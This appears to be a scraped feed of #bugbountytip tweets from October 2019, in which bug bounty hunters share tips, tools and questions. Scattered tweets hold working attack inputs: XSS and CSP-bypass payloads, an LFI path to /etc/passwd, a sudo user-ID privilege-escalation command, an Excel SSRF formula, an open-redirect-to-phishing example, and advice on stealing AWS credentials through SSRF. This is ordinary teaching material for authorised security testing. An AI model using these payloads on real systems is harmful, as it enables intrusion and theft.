bugbountytip
@a_l_e_r_t_1_


2019-10-15 17:26:34
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-15 16:04:43
1 The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss https://t.co/BBtdSvmYt6
ironfist
@ironfisto


2019-10-15 15:59:35
0 Not great tip but you might land cassanra cluster in connection tab of datastax studio. Shodan search-> html:datastax #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-15 12:56:16
7 #bugbountytip #bugbounty This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location. https://t.co/ODpUpWRypc
Infected Drake
@0xInfection


2019-10-15 11:33:41
1 I wrote up a small script to return a single instance of a URL from a (huge) list of URLs irrespective of their parameter values. Useful in cases where you need to sort out URLs obtained from the wayback machine. Thanks to @har1sec for the assignment. :) #infosec #bugbountytip https://t.co/BnB2fqVdTd
Random Robbie
@Random_Robbie


2019-10-15 06:35:58
2 inside a container.... limited privs? SUDO!!!! https://t.co/ocd7FodNqp sudo -u#4294967295 id uid=0(root) gid=1002(robbie) groups=1002(robbie) sudo -u#4294967295 whoami root #bugbountytip #escapethcontainer
hyperdummy
@dummyclout


2019-10-15 05:15:54
0 ping for vis. any thoughts? #bugbounty #bugbountytip
Pat.
@PuzzledPat


2019-10-15 03:22:57
0 @MacRumors, check out the year 2038 in your iPhone calendar.. notice that #Apple have given July and April some extra months. #bugbountytip https://t.co/Wrk7TEexIS
mา‰4า‰xา‰Xา‰.า‰!า‰
@Deepak_maxx


2019-10-15 03:13:31
0 Morning Like this! #bugbounty #bugbountytip https://t.co/DsshG2nqAw
ู‹
@GouveaHeitor


2019-10-14 12:51:12
1 If you found a possible IDOR like: http://host/api/AccountID=123 But it is being blocked when you pass an ID from another account, try bypass it making a parameter pollution like: http://host/api/AccountId=123&AccountId=456 #bugbountytip
Ankush Goel
@0xankush


2019-10-14 06:53:27
0 If your are not automating and scripting, you are missing on a lot of fun. It's all about time management in #bugbounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-13 18:53:47
0 Get C|EH Certified with HackDoor Trainings Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #cybersecurity #ceh #eccouncil #certification https://t.co/0gfcgW7uTM https://t.co/mzllE9lUqq
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-10-13 16:37:03
7 i have uploaded 74 new articles as a pdf files about different fields of hacking+ linux,cybersecurity,,,etc. to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/XE81lBik5M
Garth Humphreys
@garthhumphreys


2019-10-13 16:16:36
0 #Random thought: Is it #dups or #dupes ? #BugBounty #bugbountytip #infosec
Security Executions Code
@pwn0sec


2019-10-13 15:38:36
0 Bug Bounty ATT : Server-Side Request Forgery (SSRF) https://t.co/hjQLeWxwIS #bugbounty #bugbountytip #bugbountytips #ssrf #hackerone #att
ahamed morad
@Modam3r5


2019-10-13 15:06:47
2 this is one of my reports that I think let me win by the invitation. #bugbountytip https://t.co/fCcnzDat6I
Harsh kumar
@Harshku21974218


2019-10-13 12:37:58
1 Bypassing the WebARX Web Application Firewall (WAF) https://t.co/n09E8OhI2K #cybersecurity #bugbountytip
Evan Custodio
@defparam


2019-10-13 03:02:20
0 By using the boundary "SmuggleThis"+colon I could end the dangling part anywhere in the headers (could be handy). When I went to go check and see if "test.txt" was written to the server I was happy to see I had smuggled my own request and found the CDN headers. #bugbountytip https://t.co/BxYMvBYlsB
ghostlulz
@ghostlulz1337


2019-10-13 02:11:51
0 You know you can turn that SSRF finding into something with devastating impact right? The AWS metadata REST API can be used to steal credentials via SSRF. More information on my blog: https://t.co/2DgWQ2LJkp #infosec #bugbountytips #osint #redteam #aws #bugbountytip #ssrf #hack https://t.co/CCpKLNnF1m
Ashraf
@m0rph1n3e


2019-10-13 01:04:21
0 SPENDING HOURS TESTING MY TARGET FOR CLIENT SIDE VULNERABILITIES, I AM STUCK AT THIS POINT. ANY ADVICE? METHODOLOGY? #bugbounty #bugbountytip #bugbountytips #infosec #xss #ssti #rce #hackerone
Andri Wahyudi ๐Ÿ“‚
@andripwn


2019-10-12 22:03:00
1 admin live now #bugbounty #bugbountytip https://t.co/VEXedERrSN
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-10-12 19:33:37
1 automatic screenshot tools,used to take a screenshots to large list of targets to extract useful info like errors that may lead to vulnerabilities -1-EyeWitness: https://t.co/7kbFXmViog -2-HTTPScreenShot: https://t.co/93SafaL5kg -3-Gowitness: https://t.co/YW8bdd75MW #bugbountytip
Rohit Kumar (@rohitcoder)
@rohitcoder


2019-10-12 09:30:44
0 https://t.co/KGbg9IYk2W Bounty: $$$ Thanks to facebook and other programs they're helping me to carry out my startup with these funds. This BugBounty life really helped me alot. #BugBountyTip #BugBounty #Facebook #FacebookBugBounty #Hacker0x01 #EthicalHacking #Hacking
FS
@fsec__


2019-10-12 01:56:49
0 Terminal tips #bugbountytips #bugbountytip #bugbounty https://t.co/dMR3wWBW9c
hacks2learn
@hacks2learn


2019-10-12 00:48:14
0 #ProTip when dropping XSS payloads into a complex dynamic application use breadcrumbs to retrace your steps. I spent 60+ mins trying to find where my hidden pop-up came from... instead use tests like alert("Home->Settings->Profile->Background->Image->NAME_field") #bugbountytip
Garth Humphreys
@garthhumphreys


2019-10-11 20:59:04
0 Gained admin access! #BugBounty #bugbountytip #bugbounties #infosec #appsec #writeup https://t.co/tOKQkuzHax
kaustubh padwad
@s3curityb3ast


2019-10-11 20:46:37
0 One of the best part of @SynackRedTeam is there missions. I rarely got change to grab one. But they are quick they pays and knowledge is bonus from it #bugbounty #bugbountytip #synack https://t.co/kBptrSMaam
Mourad
@SecuAudit


2019-10-11 16:04:53
0 Livechat is the most vulnerable part of a website , you have 85% of chance to find an XSS or IDOR there , if your favorite Bug Bounty program have a livechat support start pentesting it. #bugbountytip #bugbountytips #BugBounty https://t.co/LSwH3IZwY4
Somdev Sangwan
@s0md3v


2019-10-11 12:44:42
1 I performed a little experiment on bug hunters and as it turns out, lot of them are....curious hackers. Tweet 1's statistics are for 12 minutes and Tweet 2's statistics are for 5 minutes. Dear marketers, if you add #bugbountytip, these people will even read food recipes. https://t.co/s6vSo7Yra2
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-11 10:09:48
0 Maximise Your Bug Bounty Tutorial ๐Ÿคฉ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/0gfcgW7uTM
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-11 10:06:48
0 Maximise Your Bug Bounty โ€”- ๐Ÿค‘๐Ÿค‘๐Ÿค‘ Bug Bounty Tools โ€” ๐Ÿคฉ๐Ÿคฉ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/OgAsV7XrzP
mา‰4า‰xา‰Xา‰.า‰!า‰
@Deepak_maxx


2019-10-11 09:13:57
1 And sometimes for (LFI) url?para=//..//..//..//..//..//..//..//..//etc//passwd// Works!! #bugbountytip #BugBounty #bugbountytips #bugbounty
Sudoka
@sudo_sudoka


2019-10-11 04:35:44
0 Today I learn that @binaryedgeio can find many more things than Shodan. I searched for Pulse Secure VPN and found many servers that Shodan not indexes. You should give it a try at https://t.co/AZ43zPOuOW #BugBounty #bugbountytip #infosec #ThreatIntel #recon https://t.co/R0yBjlP0Gz
Murdockz
@Murdockz_CEH


2019-10-11 03:20:28
0 5 hours = 2 Critical 1. Admin ATO 2. GraphQL API privilege escalation Take a step back and learn from your mistakes then come back harder. Writeups soon. #bugbounty #infosec #bugbountytip
Ashraf
@m0rph1n3e


2019-10-10 15:10:32
0 I'VE FOUND API, TOKENS, AND SECRET KEYS. HOW TO VALIDATE BEFORE WRITING A REPORT? I WISH SOMEONE ANSWER ME ASAP. #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity #WAF #SSTi #RCE #XSS #DataLeakage
Vincent RATISKOL
@vratiskol


2019-10-10 14:26:18
0 To illustrate my previous post, Burp Session handling tracer showing session validation with macro before sending request @Burp_Suite #bugbountytip https://t.co/F90REmVw0J
Michele Romano
@Mik317_


2019-10-10 14:19:50
2 What endpoints do you control when you come across a WP/Ghost instance? I've found a really good one: /blog/_wpeprivate/config.json, what about you? #BugBounty #bugbountytip
Security Executions Code
@pwn0sec


2019-10-10 12:58:41
1 Android App Penetration Testing #1 https://t.co/mlqVodvKJp #bugbounty #android #app #vulnerability #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-10 12:45:07
0 Maximise Your Bug Bounty With this Google Dork -- / -- inurl:fisheye AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:https://t.co/lc63NzPGi5 inurl:crucible AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:http://github #BugBounty #BugBountyTip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-10 11:54:38
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-10 08:07:07
1 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/Yytl4wdZn9
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-10 08:06:46
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/RQMWrnQNek
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-10 08:06:27
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/OY9jiDUdDR
mา‰4า‰xา‰Xา‰.า‰!า‰
@Deepak_maxx


2019-10-10 07:30:32
1 Simple Script for scanning ports of all grabbed subdomains using masscan for scan in $(cat <file-path>); do masscan -p1-65535 $(dig +short $scan|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee port_scan #BugBountyTips #bugbountytip #bugbounty
Iamsaintmalik_
@saintmalik_


2019-10-09 20:30:16
0 Guys am getting this response while trying to load some xss scripts, any help on how I can bypass this @bugbountyforum @stokfredrik @s0md3v #bugbountytips #BugBounty #bugbountytip https://t.co/n3jWvvTt7e
m0z
@LooseSecurity


2019-10-09 19:02:07
3 A quick reminder that my bug bounty challenge site is still live with 2 challenges! The second of which is very advanced (encorporating a WAF). https://t.co/cNYQsVPQ3K #bugbountytips #bugbountytip #bugbounties #bugbountyprogreartip
Rรฉmy Marot
@R_Marot


2019-10-09 19:01:00
0 Simple but useful tool if you only have an index file inside a .git directory (no luck :)) and want to have it human readable : https://t.co/QRHd7CbsYC #bugbountytip
mา‰4า‰xา‰Xา‰.า‰!า‰
@Deepak_maxx


2019-10-09 18:58:38
0 One liner to import whole list of subdomains into Burp suite for automated scanning! cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #bugbountytips #bugbounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-09 17:35:17
0 Free Antivirus Be Like โ€”// Follow Us -- https://t.co/S9CwjVYiHOโ€ฆ #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/XRSvgxtOyT
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-09 17:34:35
2 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/S9CwjVYiHOโ€ฆ #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
Mourad
@SecuAudit


2019-10-09 15:36:58
0 if you find a Form where you need ( Email + Date of birth + Zip code) to login , try to remove Zip code and Date of birth and send the form . #bugbountytip #bugbountytips #BugBounty https://t.co/uVw71NPXLo
tololovejoi
@tolo7010


2019-10-09 13:43:58
0 Question: Can i know how old are you sir? Please answer me Answer: (Please see my replies below): #bugbounty #bugbountytips #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-10-09 13:29:09
0 account takeover write up all what u need is the email of the victim #bugbountytips #bugbountytip #cybersecurite https://t.co/W1DzdvWjST
Sanketh Sharath
@sharathsanketh


2019-10-09 12:57:14
0 Thanks very much @PentesterLand for featuring my blog post/article in your newsletter this week! Was pleasantly surprised. Appreciate it :) This is a lot of motivation for a beginner like me. Cheers! #bugbounty #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-09 12:47:35
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Mourad
@SecuAudit


2019-10-09 11:11:35
0 Pentesting is becoming Harder and Harder , When I started in 2013 things were different , Now you need to grow your Mindset more than your Skills to Survive and achieve a decent living standard from BugBounty . #bugbounty #bugbountytip #pentesting #hackerone https://t.co/envVq5Lu0Q
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-10-09 09:03:26
6 Sub-Domain Takeover Tools: -1-SubOver:https://t.co/uzQ2X1rQ2v -2-Subjack:https://t.co/FdytR89u1w -3-autoSubTakeover:https://t.co/TWHTicVKnI -4-tko-subs:https://t.co/Tawtj1NvWc -5-HostileSubBruteforcer:https://t.co/3ydVulWy8l -6-Aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-10-09 07:53:40
2 2 udemy courses about ethical hacking free for a limited time both are 50 hours of useful content + high quality videos.and you will get a certification when finished prove that you finished the course. https://t.co/3xMEpNFL7u https://t.co/oZvixlG4LL #bugbountytip #hacking
mา‰4า‰xา‰Xา‰.า‰!า‰
@Deepak_maxx


2019-10-09 07:07:53
0 Just saw your video on automation for finding 3rd level domains @thecybermentor It was nice!, Can use subfinder instead with -recursive option will do the same right? subfinder -d <domain> -recursive -silent -t 200 -v -o <out-put-file> #bugbounty #bugbountytip
Hritik Sharma
@iamHritikSH


2019-10-09 05:56:22
0 Server parses the XML but the problem is parameter entities are not working and whenever I try to use normal entity the server responds that content is not valid for application/xml, any tips community? #bugbounty #bugbountytips #bugbountytip
Brodie Codie
@brodie_codie


2019-10-09 03:04:35
3 Mood After finding another Bug #hackers #netsec #bugbounty #hacking #redteam #OSINT #recon #offsec #CTF #pentest #bugbountytip #bugbountytips #BrodieCodie #Metasploit #infosec #infosecurity https://t.co/bqwQBo5GVj
m0z
@LooseSecurity


2019-10-08 20:49:41
3 When I started out on my #BugBounty journey a little over 2 years ago, I read all the vulnerabilities on this page (and attempted to make a vuln web app to test some of them): https://t.co/M8VmqRlt8I I hope it helps someone else start their journey. #bugbountytip #bugbountytips
baluz๐Ÿ”ฅ
@haknfuk


2019-10-08 14:42:47
0 If u feel like quitting stop feeling it #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:48:22
0 #bugbountytip if you ever encounter a endpoint filtering ' try \' it may work sometimes :) #sqli
Khaled Mohamed
@xelkomy


2019-10-08 12:42:46
0 awesome machine #hackthebox @hackthebox_eu #bugbountytip https://t.co/RtbEq1u5Z9
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:15:05
0 Hackers Turn Own Features Against It ๐Ÿ”ฅ๐Ÿ’• #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-08 10:23:58
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-07 16:46:27
0 Seriously don't waste your time on searching for crlf injections, today i scanned nearly 30000+ unique domains and guess how many crlf's i found 0. #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-07 07:17:36
1 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-07 06:06:27
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Sudoka
@sudo_sudoka


2019-10-07 04:50:48
0 Koha, the popular open source ILS, has Open Redirect at https://t.co/4FJZI7rSG7. Google Dork for inurl:/cgi-bin/koha/ Then send a request to victims like this: site[.]com/cgi-bin/koha/tracklinks.pl?uri=//phishing.site #bugbounty #bugbountytip #threatintel
Securisec ๐Ÿš€
@securisec


2019-10-07 00:40:26
2 "RT RT LooseSecurity: Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/bVfEZ0Drd4 #bugbountytips #BugBounty #bugbountytip"
Abood Nour
@AboodNour


2019-10-06 23:35:12
1 Found a better way to search GitHub projects using their own search filters. https://t.co/JJ7sn2DjQj In my case: `filename:file.php libname in:path` increased returned unique results to > 1.2K instead of ~20 returned from similar Google dork #BugBountyTip #BugBounty
m0z
@LooseSecurity


2019-10-06 22:32:42
5 Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/NHrtVoOw04 #bugbountytips #BugBounty #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2019-10-06 22:17:04
3 Coming this week: the first video in the 'Finding Your First Bug' series, we're going to look at Business Logic Errors, first we'll look at what they are, how to find them, examples of some real bugs and do a practical with Burp! #BugBounty #bugbountytips #bugbountytip https://t.co/KxOUGVSxR3
RHack
@Queseguridad


2019-10-06 19:38:39
0 Some payloads bypass XSS '"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> CloudFront 1%3C/script%3E%3Csvg/onload=prompt(document[`domain`])%3E Akamai <dETAILS/open/onToGgle=a=prompt,a(45) x> Inperva #Bugbounty #Bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-06 19:11:55
3 Findomain 0.5.0 is out! Now you can also send new subdomain alerts to @telegram! Check out the documentation for a detailed guide on how get it working! https://t.co/VKrEP3eY4d #subdomains #enumeration #monitoring #BugBounty #bugbountytip #reconnaissance #automation #webhooks
Joe Bradshaw
@SnakesNBradders


2019-10-06 17:01:47
0 Want to extend this to the bugbounty community as well for help. #bugbountytip https://t.co/eqYt3M5gFX
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-10-06 08:01:17
3 during a web pentesting operations when seeing a Registration page you should try register with an existing username, to see if you can enumerate users. this is what i saw on @PayPal you can automate the whole process and get a list of website users. #bugbountytip #hacking https://t.co/WOZYUy4ulH
baluz๐Ÿ”ฅ
@haknfuk


2019-10-06 06:15:57
1 #bugbounty #bugbountytip a channel for coders https://t.co/9JRrkSX6Pe
John mash
@Techhelplistcom


2019-10-06 05:00:01
0 i have uploaded 38 new articles as a pdf files about different fields of hacking to my github repository . enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/fNomAuiIdC https://t.co/waACGyXyHC
Matt Palmer
@mattpalmer_au


2019-10-06 04:44:27
0 1. First Program: Indeed 2. Had difficulties: Google 3. Most used Platform: Bugcrowd and Google 4. Totally hate: 5. Most loved: Automation 6. For beginners: Read, read, read #bugbounty #bugbountytip #bugbountytips https://t.co/EevoSwrDA5
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-10-06 04:28:06
4 i have uploaded 38 new articles as a pdf files about different fields of hacking to my github repository . enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/q2layzVpKz https://t.co/52Utrc6IMy
Imran nissar
@Imrannissar3


2019-10-05 22:25:11
0 Unexpected behaviour regarding web cache deception attack. Using Account 1 the page is being cached for 1 min and i am able to see all the information in incognito/different browser but When i loggin from a different account the page is not being cached #bugbountytip #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-05 19:29:36
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
jub0bs
@jub0bs


2019-10-05 17:15:48
0 #BugBountyTip "[Blind SSRF] cannot be trivially exploited to retrieve sensitive data from back-end systems"... except when forged requests to an attacker-controlled server contain sensitive data (e.g. an API key in headers). Happened to me a few days ago. https://t.co/LTrqNqZ8zK
Nick (@hunt4p1zza)
@ngkogkos


2019-10-05 13:41:01
2 Custom wordlist for file/folder/param fuzzing: 1. Flag interesting requests w/ "WLIST" in Burp constantly 2. Sort requests w/ "WLIST" > HTTP History 3. Use CO2 plugin, send requests to CeWLer & Extract Words 4. Normalize wordlist to ASCII w/ IDE/bash #bugbounty #bugbountytip https://t.co/lazF02od9j
bugbountytip
@a_l_e_r_t_1_


2019-10-05 12:39:03
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Jinone
@jinonehk


2019-10-05 09:57:12
0 <script src="https://t.co/1UvE8Y0fOd)"></script> bypass csp https://t.co/Jt9xQeag4g #BugBounty #BugBountyTip #WAF https://t.co/nz2OYbKBGx
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-04 21:14:53
0 Silent omission of certificate hostname verification in LibreSSL and BoringSSL Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/A2EJ8bgNyP
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-04 21:13:13
0 Malware Analysis 101 - Sandboxing Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/TXX3kDeuhe
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-04 21:09:35
0 Pushing Left, Like a Boss: Table of Contents Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Xs9P4t11CR
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-04 21:08:16
0 Red Teamerโ€™s Guide to Pulse Secure SSL VPN Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/7qf0K4KUKR
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-04 21:04:53
2 Download predictions details of ads plans of any business. Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/nj3z2KLprL
Nick (@hunt4p1zza)
@ngkogkos


2019-10-04 19:20:20
0 This is the bash function I use for #bugbounty on a target. Although I use checklists, enforcing organization via the filesystem forces me to do a good/clean job & serves as a 2nd checklist. Also, helps w/ being more efficient, as you can tailor cheatsheets/scripts. #bugbountytip https://t.co/B7gq2pvaZW
bugbountytip
@a_l_e_r_t_1_


2019-10-04 15:50:17
0 Chrome โŽ Firefox โœ… #Bugbountytip https://t.co/nB1NqVdEPK
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-10-04 13:37:36
2 The Multi-Tool Web Vulnerability Scanner. sometimes you may need to automate some work+ it may give you some ideas wget -O https://t.co/AVYJOtJVY1 https://t.co/eBwaz4GrYH && chmod +x https://t.co/AVYJOtJVY1 python https://t.co/AVYJOtJVY1 https://t.co/KdHhpMDaA0 #bugbountytip https://t.co/wMBgzbyvVx
Michele Romano
@Mik317_


2019-10-04 13:32:34
1 Bypassed a CSTI protection: {{alert(1)}} renders a <span> tag with value 1 ... JS not evaluated, but you can turn it in {{alert('<script>alert(1)</script>')}} and your day becomes a better day ๐Ÿ˜Š #bugbountytip
Shiva Kumawat
@ShivaKumawat88


2019-10-04 12:59:48
0 It ay be a bug at #amazon mobile app #AmazonRocketDeals #AmazonGreatIndianFestival #AmazonRiddler #JokerMovie #bugbountytip #techno Here is video link--- https://t.co/I16F6WSj85
Evan Custodio
@defparam


2019-10-04 12:18:43
0 If an app accepts XLSX to convert to PDF/HTML it may run the file through MS Excel to eval formulas/convert. Try testing =WEBSERVICE(https://t.co/VXyqysIsep) and see if XML/HTML is added to the form (insta-SSRF). No clue excel even had this function #bugbountytip #bugbountytips
Flawwan
@Flawwan


2019-10-04 10:29:30
0 New blog post: Abusing PHP stripย tags to bypass modern WAF to exploit XSS. https://t.co/MXRTMOuoEV #BugBounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-04 09:41:07
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Khaled Mohamed
@xelkomy


2019-10-04 08:30:35
0 #xss #bugbountytip #xelkomy Reflected Xss in Ibm POC https://t.co/YOoDCKbYHe
Imran nissar
@Imrannissar3


2019-10-04 07:58:45
0 Password reset host header injection Host: https://t.co/cxR3o4EYIs Bypassed by Host:https://t.co/cxR3o4EYIs"><a href='https://t.co/wgqXnDuzXt> #bugbountytip #bugbounty @Hacker0x01 @Bugcrowd
Verneet
@err0rrrrr


2019-10-04 06:41:10
1 Bypass CSP with: <embed /: script allowscriptaccess = always src = javascript:alert(document.cookie); https://t.co/dIZsSFrPmX> Just bypassed a Taxi company CSP :p @LooseSecurity #bugbountytip #bugbounty #bugcrowd
Evan Custodio
@defparam


2019-10-04 00:06:57
0 @AldoTheCrott @NahamSec @Twitch HTML injection in a email callback where I could control the CC addr and parts of the body. #bugbountytip test adding HTML into email callbacks. If the email puts the email address in the body try adding HTML after a '+'-sign alias (e.g. foo+<B><BR>[email protected])
A hacker's life
@Unknownuser1806


2019-10-03 20:49:05
0 Open redirect payloads https://t.co/ObQYpkmvym #payload,#hacking, #bugbounty,#bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-03 20:08:23
0 Bug Bounty = Hardwork + Will Power + Dedication #bugbounty #bugbountytip #devsecops #devops #secops #cybersecurity #hacking https://t.co/o9uZTW5vDa
Fisher
@Regala_


2019-10-03 18:31:03
0 @rudra16t @zseano Are you learning? Are you improving? Are you a better hacker than what you were a year ago? You get imposter syndrome if you compare yourself to others. YOU are only one you should compare and compete with. #bugbountytip
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-10-03 15:39:29
0 #bugbountytips #bugbountytip Need help. Get good xss from cookie based xss. Any suggestion? Share your knowledge.
Masonhck357
@DanielM59720745


2019-10-03 14:56:24
0 #bugbountytip NEVER STOP DOING RECON: I ended up finding sensitive info on a subdomain that I found doing recon the second time around last week. I just found out that the subdomain is only used when they sell tickets for an event. They said that my timing was just perfect :)
intigriti
@intigriti


2019-10-03 14:18:30
